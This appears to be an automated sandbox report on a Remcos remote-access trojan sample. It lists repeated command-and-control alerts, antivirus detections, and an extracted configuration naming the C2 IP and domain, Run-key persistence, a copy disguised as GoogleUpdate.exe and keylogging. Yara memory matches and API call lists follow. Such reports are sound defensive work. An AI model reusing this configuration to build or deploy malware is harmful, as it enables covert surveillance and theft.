                  2025-01-11T20:08:06.018215+010020327761Malware Command and Control Activity Detected192.168.2.450739198.50.242.157443TCP
                  2025-01-11T20:08:06.019254+010020327761Malware Command and Control Activity Detected192.168.2.450740198.50.242.157443TCP
                  2025-01-11T20:08:06.020098+010020327761Malware Command and Control Activity Detected192.168.2.450741198.50.242.157443TCP
                  2025-01-11T20:08:06.021198+010020327761Malware Command and Control Activity Detected192.168.2.450742198.50.242.157443TCP
                  2025-01-11T20:08:06.022099+010020327761Malware Command and Control Activity Detected192.168.2.450743198.50.242.157443TCP
                  2025-01-11T20:08:06.023099+010020327761Malware Command and Control Activity Detected192.168.2.450744198.50.242.157443TCP
                  2025-01-11T20:08:06.024071+010020327761Malware Command and Control Activity Detected192.168.2.450745198.50.242.157443TCP
                  2025-01-11T20:08:06.025203+010020327761Malware Command and Control Activity Detected192.168.2.450746198.50.242.157443TCP
                  2025-01-11T20:08:06.026124+010020327761Malware Command and Control Activity Detected192.168.2.450747198.50.242.157443TCP
                  2025-01-11T20:08:06.026990+010020327761Malware Command and Control Activity Detected192.168.2.450748198.50.242.157443TCP
                  2025-01-11T20:08:06.028060+010020327761Malware Command and Control Activity Detected192.168.2.450749198.50.242.157443TCP
                  2025-01-11T20:08:06.030276+010020327761Malware Command and Control Activity Detected192.168.2.450751198.50.242.157443TCP
                  2025-01-11T20:08:06.032511+010020327761Malware Command and Control Activity Detected192.168.2.450753198.50.242.157443TCP
                  2025-01-11T20:08:06.033553+010020327761Malware Command and Control Activity Detected192.168.2.450754198.50.242.157443TCP
                  2025-01-11T20:08:06.034369+010020327761Malware Command and Control Activity Detected192.168.2.450755198.50.242.157443TCP
                  2025-01-11T20:08:06.035354+010020327761Malware Command and Control Activity Detected192.168.2.450756198.50.242.157443TCP
                  2025-01-11T20:08:06.036996+010020327761Malware Command and Control Activity Detected192.168.2.450758198.50.242.157443TCP
                  2025-01-11T20:08:06.037849+010020327761Malware Command and Control Activity Detected192.168.2.450759198.50.242.157443TCP
                  2025-01-11T20:08:06.038694+010020327761Malware Command and Control Activity Detected192.168.2.450760198.50.242.157443TCP
                  2025-01-11T20:08:06.039768+010020327761Malware Command and Control Activity Detected192.168.2.450761198.50.242.157443TCP
                  2025-01-11T20:08:06.040529+010020327761Malware Command and Control Activity Detected192.168.2.450762198.50.242.157443TCP
                  2025-01-11T20:08:06.041406+010020327761Malware Command and Control Activity Detected192.168.2.450763198.50.242.157443TCP
                  2025-01-11T20:08:06.042148+010020327761Malware Command and Control Activity Detected192.168.2.450764198.50.242.157443TCP
                  2025-01-11T20:08:06.043162+010020327761Malware Command and Control Activity Detected192.168.2.450765198.50.242.157443TCP
                  2025-01-11T20:08:06.045161+010020327761Malware Command and Control Activity Detected192.168.2.450767198.50.242.157443TCP
                  2025-01-11T20:08:06.046207+010020327761Malware Command and Control Activity Detected192.168.2.450768198.50.242.157443TCP
                  2025-01-11T20:08:06.046946+010020327761Malware Command and Control Activity Detected192.168.2.450769198.50.242.157443TCP
                  2025-01-11T20:08:06.048077+010020327761Malware Command and Control Activity Detected192.168.2.450770198.50.242.157443TCP
                  2025-01-11T20:08:06.050106+010020327761Malware Command and Control Activity Detected192.168.2.450772198.50.242.157443TCP
                  2025-01-11T20:08:06.051703+010020327761Malware Command and Control Activity Detected192.168.2.450774198.50.242.157443TCP
                  2025-01-11T20:08:06.052584+010020327761Malware Command and Control Activity Detected192.168.2.450775198.50.242.157443TCP
                  2025-01-11T20:08:06.055171+010020327761Malware Command and Control Activity Detected192.168.2.450777198.50.242.157443TCP
                  2025-01-11T20:08:06.056428+010020327761Malware Command and Control Activity Detected192.168.2.450778198.50.242.157443TCP
                  2025-01-11T20:08:06.059750+010020327761Malware Command and Control Activity Detected192.168.2.450780198.50.242.157443TCP
                  2025-01-11T20:08:06.061735+010020327761Malware Command and Control Activity Detected192.168.2.450781198.50.242.157443TCP
                  2025-01-11T20:08:06.070189+010020327761Malware Command and Control Activity Detected192.168.2.450783198.50.242.157443TCP
                  2025-01-11T20:08:06.072108+010020327761Malware Command and Control Activity Detected192.168.2.450784198.50.242.157443TCP
                  2025-01-11T20:08:06.082825+010020327761Malware Command and Control Activity Detected192.168.2.450786198.50.242.157443TCP
                  2025-01-11T20:08:06.086806+010020327761Malware Command and Control Activity Detected192.168.2.450789198.50.242.157443TCP
                  2025-01-11T20:08:06.090491+010020327761Malware Command and Control Activity Detected192.168.2.450792198.50.242.157443TCP
                  2025-01-11T20:08:06.092990+010020327761Malware Command and Control Activity Detected192.168.2.450794198.50.242.157443TCP
                  2025-01-11T20:08:06.093978+010020327761Malware Command and Control Activity Detected192.168.2.450795198.50.242.157443TCP
                  2025-01-11T20:08:06.095119+010020327761Malware Command and Control Activity Detected192.168.2.450796198.50.242.157443TCP
                  2025-01-11T20:08:06.096596+010020327761Malware Command and Control Activity Detected192.168.2.450797198.50.242.157443TCP
                  2025-01-11T20:08:06.097571+010020327761Malware Command and Control Activity Detected192.168.2.450798198.50.242.157443TCP
                  2025-01-11T20:08:06.101374+010020327761Malware Command and Control Activity Detected192.168.2.450801198.50.242.157443TCP
                  2025-01-11T20:08:06.106426+010020327761Malware Command and Control Activity Detected192.168.2.450802198.50.242.157443TCP
                  2025-01-11T20:08:06.107958+010020327761Malware Command and Control Activity Detected192.168.2.450803198.50.242.157443TCP
                  2025-01-11T20:08:06.108966+010020327761Malware Command and Control Activity Detected192.168.2.450804198.50.242.157443TCP
                  2025-01-11T20:08:06.112920+010020327761Malware Command and Control Activity Detected192.168.2.450807198.50.242.157443TCP
                  2025-01-11T20:08:06.113890+010020327761Malware Command and Control Activity Detected192.168.2.450808198.50.242.157443TCP
                  2025-01-11T20:08:06.116548+010020327761Malware Command and Control Activity Detected192.168.2.450810198.50.242.157443TCP
                  2025-01-11T20:08:06.119699+010020327761Malware Command and Control Activity Detected192.168.2.450812198.50.242.157443TCP
                  2025-01-11T20:08:06.121198+010020327761Malware Command and Control Activity Detected192.168.2.450813198.50.242.157443TCP
                  2025-01-11T20:08:06.129553+010020327761Malware Command and Control Activity Detected192.168.2.450816198.50.242.157443TCP
                  2025-01-11T20:08:06.134701+010020327761Malware Command and Control Activity Detected192.168.2.450820198.50.242.157443TCP
                  2025-01-11T20:08:06.139027+010020327761Malware Command and Control Activity Detected192.168.2.450823198.50.242.157443TCP
                  2025-01-11T20:08:06.141242+010020327761Malware Command and Control Activity Detected192.168.2.450825198.50.242.157443TCP
                  2025-01-11T20:08:06.142800+010020327761Malware Command and Control Activity Detected192.168.2.450826198.50.242.157443TCP
                  2025-01-11T20:08:06.143907+010020327761Malware Command and Control Activity Detected192.168.2.450827198.50.242.157443TCP
                  2025-01-11T20:08:06.146962+010020327761Malware Command and Control Activity Detected192.168.2.450829198.50.242.157443TCP
                  2025-01-11T20:08:06.151502+010020327761Malware Command and Control Activity Detected192.168.2.450830198.50.242.157443TCP
                  2025-01-11T20:08:06.153222+010020327761Malware Command and Control Activity Detected192.168.2.450832198.50.242.157443TCP
                  2025-01-11T20:08:06.155296+010020327761Malware Command and Control Activity Detected192.168.2.450833198.50.242.157443TCP
                  2025-01-11T20:08:06.160770+010020327761Malware Command and Control Activity Detected192.168.2.450837198.50.242.157443TCP
                  2025-01-11T20:08:06.164027+010020327761Malware Command and Control Activity Detected192.168.2.450839198.50.242.157443TCP
                  2025-01-11T20:08:06.166467+010020327761Malware Command and Control Activity Detected192.168.2.450841198.50.242.157443TCP
                  2025-01-11T20:08:06.167686+010020327761Malware Command and Control Activity Detected192.168.2.450842198.50.242.157443TCP
                  2025-01-11T20:08:06.168790+010020327761Malware Command and Control Activity Detected192.168.2.450843198.50.242.157443TCP
                  2025-01-11T20:08:06.169908+010020327761Malware Command and Control Activity Detected192.168.2.450844198.50.242.157443TCP
                  2025-01-11T20:08:06.173805+010020327761Malware Command and Control Activity Detected192.168.2.450845198.50.242.157443TCP
                  2025-01-11T20:08:06.177731+010020327761Malware Command and Control Activity Detected192.168.2.450848198.50.242.157443TCP
                  2025-01-11T20:08:06.179034+010020327761Malware Command and Control Activity Detected192.168.2.450849198.50.242.157443TCP
                  2025-01-11T20:08:06.180524+010020327761Malware Command and Control Activity Detected192.168.2.450850198.50.242.157443TCP
                  2025-01-11T20:08:06.181737+010020327761Malware Command and Control Activity Detected192.168.2.450851198.50.242.157443TCP
                  2025-01-11T20:08:06.184400+010020327761Malware Command and Control Activity Detected192.168.2.450853198.50.242.157443TCP
                  2025-01-11T20:08:06.185774+010020327761Malware Command and Control Activity Detected192.168.2.450854198.50.242.157443TCP
                  2025-01-11T20:08:06.189003+010020327761Malware Command and Control Activity Detected192.168.2.450856198.50.242.157443TCP
                  2025-01-11T20:08:06.193534+010020327761Malware Command and Control Activity Detected192.168.2.450858198.50.242.157443TCP
                  2025-01-11T20:08:06.198412+010020327761Malware Command and Control Activity Detected192.168.2.450861198.50.242.157443TCP
                  2025-01-11T20:08:06.199619+010020327761Malware Command and Control Activity Detected192.168.2.450862198.50.242.157443TCP
                  2025-01-11T20:08:06.203104+010020327761Malware Command and Control Activity Detected192.168.2.450865198.50.242.157443TCP
                  2025-01-11T20:08:06.204005+010020327761Malware Command and Control Activity Detected192.168.2.450866198.50.242.157443TCP
                  2025-01-11T20:08:06.206515+010020327761Malware Command and Control Activity Detected192.168.2.450868198.50.242.157443TCP
                  2025-01-11T20:08:06.207502+010020327761Malware Command and Control Activity Detected192.168.2.450869198.50.242.157443TCP
                  2025-01-11T20:08:06.208912+010020327761Malware Command and Control Activity Detected192.168.2.450870198.50.242.157443TCP
                  2025-01-11T20:08:06.211485+010020327761Malware Command and Control Activity Detected192.168.2.450871198.50.242.157443TCP
                  2025-01-11T20:08:06.215489+010020327761Malware Command and Control Activity Detected192.168.2.450872198.50.242.157443TCP
                  2025-01-11T20:08:06.218362+010020327761Malware Command and Control Activity Detected192.168.2.450874198.50.242.157443TCP
                  2025-01-11T20:08:06.223109+010020327761Malware Command and Control Activity Detected192.168.2.450877198.50.242.157443TCP
                  2025-01-11T20:08:06.224849+010020327761Malware Command and Control Activity Detected192.168.2.450878198.50.242.157443TCP
                  2025-01-11T20:08:06.229788+010020327761Malware Command and Control Activity Detected192.168.2.450879198.50.242.157443TCP
                  2025-01-11T20:08:06.232850+010020327761Malware Command and Control Activity Detected192.168.2.450881198.50.242.157443TCP
                  2025-01-11T20:08:06.234041+010020327761Malware Command and Control Activity Detected192.168.2.450882198.50.242.157443TCP
                  2025-01-11T20:08:06.244439+010020327761Malware Command and Control Activity Detected192.168.2.450887198.50.242.157443TCP
                  2025-01-11T20:08:06.247832+010020327761Malware Command and Control Activity Detected192.168.2.450890198.50.242.157443TCP
                  2025-01-11T20:08:06.249050+010020327761Malware Command and Control Activity Detected192.168.2.450891198.50.242.157443TCP
                  2025-01-11T20:08:06.256648+010020327761Malware Command and Control Activity Detected192.168.2.450898198.50.242.157443TCP
                  2025-01-11T20:08:06.261866+010020327761Malware Command and Control Activity Detected192.168.2.450899198.50.242.157443TCP
                  2025-01-11T20:08:06.267422+010020327761Malware Command and Control Activity Detected192.168.2.450901198.50.242.157443TCP
                  2025-01-11T20:08:06.270640+010020327761Malware Command and Control Activity Detected192.168.2.450903198.50.242.157443TCP
                  2025-01-11T20:08:06.284846+010020327761Malware Command and Control Activity Detected192.168.2.450908198.50.242.157443TCP
                  2025-01-11T20:08:06.288379+010020327761Malware Command and Control Activity Detected192.168.2.450911198.50.242.157443TCP
                  2025-01-11T20:08:06.289894+010020327761Malware Command and Control Activity Detected192.168.2.450912198.50.242.157443TCP
                  2025-01-11T20:08:06.291224+010020327761Malware Command and Control Activity Detected192.168.2.450913198.50.242.157443TCP
                  2025-01-11T20:08:06.295350+010020327761Malware Command and Control Activity Detected192.168.2.450917198.50.242.157443TCP
                  2025-01-11T20:08:06.299445+010020327761Malware Command and Control Activity Detected192.168.2.450921198.50.242.157443TCP
                  2025-01-11T20:08:06.300381+010020327761Malware Command and Control Activity Detected192.168.2.450922198.50.242.157443TCP
                  2025-01-11T20:08:06.302179+010020327761Malware Command and Control Activity Detected192.168.2.450924198.50.242.157443TCP
                  2025-01-11T20:08:06.305808+010020327761Malware Command and Control Activity Detected192.168.2.450927198.50.242.157443TCP
                  2025-01-11T20:08:06.310716+010020327761Malware Command and Control Activity Detected192.168.2.450932198.50.242.157443TCP
                  2025-01-11T20:08:06.311714+010020327761Malware Command and Control Activity Detected192.168.2.450933198.50.242.157443TCP
                  2025-01-11T20:08:06.312593+010020327761Malware Command and Control Activity Detected192.168.2.450934198.50.242.157443TCP
                  2025-01-11T20:08:06.313441+010020327761Malware Command and Control Activity Detected192.168.2.450935198.50.242.157443TCP
                  2025-01-11T20:08:06.317840+010020327761Malware Command and Control Activity Detected192.168.2.450939198.50.242.157443TCP
                  2025-01-11T20:08:06.321553+010020327761Malware Command and Control Activity Detected192.168.2.450942198.50.242.157443TCP
                  2025-01-11T20:08:06.322477+010020327761Malware Command and Control Activity Detected192.168.2.450943198.50.242.157443TCP
                  2025-01-11T20:08:06.323953+010020327761Malware Command and Control Activity Detected192.168.2.450944198.50.242.157443TCP
                  2025-01-11T20:08:06.327231+010020327761Malware Command and Control Activity Detected192.168.2.450947198.50.242.157443TCP
                  2025-01-11T20:08:06.330909+010020327761Malware Command and Control Activity Detected192.168.2.450951198.50.242.157443TCP
                  2025-01-11T20:08:06.336787+010020327761Malware Command and Control Activity Detected192.168.2.450956198.50.242.157443TCP
                  2025-01-11T20:08:06.339408+010020327761Malware Command and Control Activity Detected192.168.2.450958198.50.242.157443TCP
                  2025-01-11T20:08:06.345176+010020327761Malware Command and Control Activity Detected192.168.2.450962198.50.242.157443TCP
                  2025-01-11T20:08:06.346211+010020327761Malware Command and Control Activity Detected192.168.2.450963198.50.242.157443TCP
                  2025-01-11T20:08:06.401786+010020327761Malware Command and Control Activity Detected192.168.2.450978198.50.242.157443TCP
                  2025-01-11T20:08:06.416169+010020327761Malware Command and Control Activity Detected192.168.2.450982198.50.242.157443TCP
                  2025-01-11T20:08:06.419009+010020327761Malware Command and Control Activity Detected192.168.2.450984198.50.242.157443TCP
                  2025-01-11T20:08:06.420521+010020327761Malware Command and Control Activity Detected192.168.2.450985198.50.242.157443TCP
                  2025-01-11T20:08:06.424936+010020327761Malware Command and Control Activity Detected192.168.2.450988198.50.242.157443TCP
                  2025-01-11T20:08:06.428324+010020327761Malware Command and Control Activity Detected192.168.2.450989198.50.242.157443TCP
                  2025-01-11T20:08:06.441841+010020327761Malware Command and Control Activity Detected192.168.2.450994198.50.242.157443TCP
                  2025-01-11T20:08:06.443885+010020327761Malware Command and Control Activity Detected192.168.2.450995198.50.242.157443TCP
                  2025-01-11T20:08:06.445412+010020327761Malware Command and Control Activity Detected192.168.2.450996198.50.242.157443TCP
                  2025-01-11T20:08:06.451076+010020327761Malware Command and Control Activity Detected192.168.2.450999198.50.242.157443TCP
                  2025-01-11T20:08:06.460301+010020327761Malware Command and Control Activity Detected192.168.2.451005198.50.242.157443TCP
                  2025-01-11T20:08:06.464923+010020327761Malware Command and Control Activity Detected192.168.2.451008198.50.242.157443TCP
                  2025-01-11T20:08:06.469885+010020327761Malware Command and Control Activity Detected192.168.2.451010198.50.242.157443TCP
                  2025-01-11T20:08:06.543839+010020327761Malware Command and Control Activity Detected192.168.2.451032198.50.242.157443TCP
                  2025-01-11T20:08:06.545085+010020327761Malware Command and Control Activity Detected192.168.2.451033198.50.242.157443TCP
                  2025-01-11T20:08:06.556801+010020327761Malware Command and Control Activity Detected192.168.2.451039198.50.242.157443TCP
                  2025-01-11T20:08:06.559735+010020327761Malware Command and Control Activity Detected192.168.2.451041198.50.242.157443TCP
                  2025-01-11T20:08:06.572882+010020327761Malware Command and Control Activity Detected192.168.2.451047198.50.242.157443TCP
                  2025-01-11T20:08:06.581798+010020327761Malware Command and Control Activity Detected192.168.2.451051198.50.242.157443TCP
                  2025-01-11T20:08:06.591571+010020327761Malware Command and Control Activity Detected192.168.2.451054198.50.242.157443TCP
                  2025-01-11T20:08:06.595642+010020327761Malware Command and Control Activity Detected192.168.2.451055198.50.242.157443TCP
                  2025-01-11T20:08:06.633380+010020327761Malware Command and Control Activity Detected192.168.2.451065198.50.242.157443TCP
                  2025-01-11T20:08:06.680123+010020327761Malware Command and Control Activity Detected192.168.2.451084198.50.242.157443TCP
                  2025-01-11T20:08:06.691239+010020327761Malware Command and Control Activity Detected192.168.2.451089198.50.242.157443TCP
                  2025-01-11T20:08:06.737110+010020327761Malware Command and Control Activity Detected192.168.2.451103198.50.242.157443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: DB5rQYsfd6.exeAvira: detected
                  Source: apleegodfivem.ddns.netAvira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\install.vbsAvira: detection malicious, Label: VBS/Runner.VPD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                  Source: DB5rQYsfd6.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["198.50.242.157:443:0", "apleegodfivem.ddns.net:443:0"], "Assigned name": "paydaytry", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "GoogleUpdate.exe", "Startup value": "ChromeUpdater", "Hide file": "Disable", "Mutex": "Attempt-S4A0CI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "GoogleDat", "Keylog folder": "bootdata", "Keylog file max size": "0"}
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeReversingLabs: Detection: 89%
                  Source: DB5rQYsfd6.exeReversingLabs: Detection: 89%
                  Source: DB5rQYsfd6.exeVirustotal: Detection: 84%Perma Link
                  Source: Yara matchFile source: DB5rQYsfd6.exe, type: SAMPLE
                  Source: Yara matchFile source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeJoe Sandbox ML: detected
                  Source: DB5rQYsfd6.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004315EC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_004315EC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D815EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_02D815EC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004315EC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,18_2_004315EC
                  Source: DB5rQYsfd6.exe, 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5492cb58-8
                  Source: DB5rQYsfd6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041A01B
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040B28E
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040838E
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004087A0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00407848
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004068CD FindFirstFileW,FindNextFileW,0_2_004068CD
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040AA71
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00417AAB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040AC78
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_02D5B28E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_02D5838E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D6A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_02D6A01B
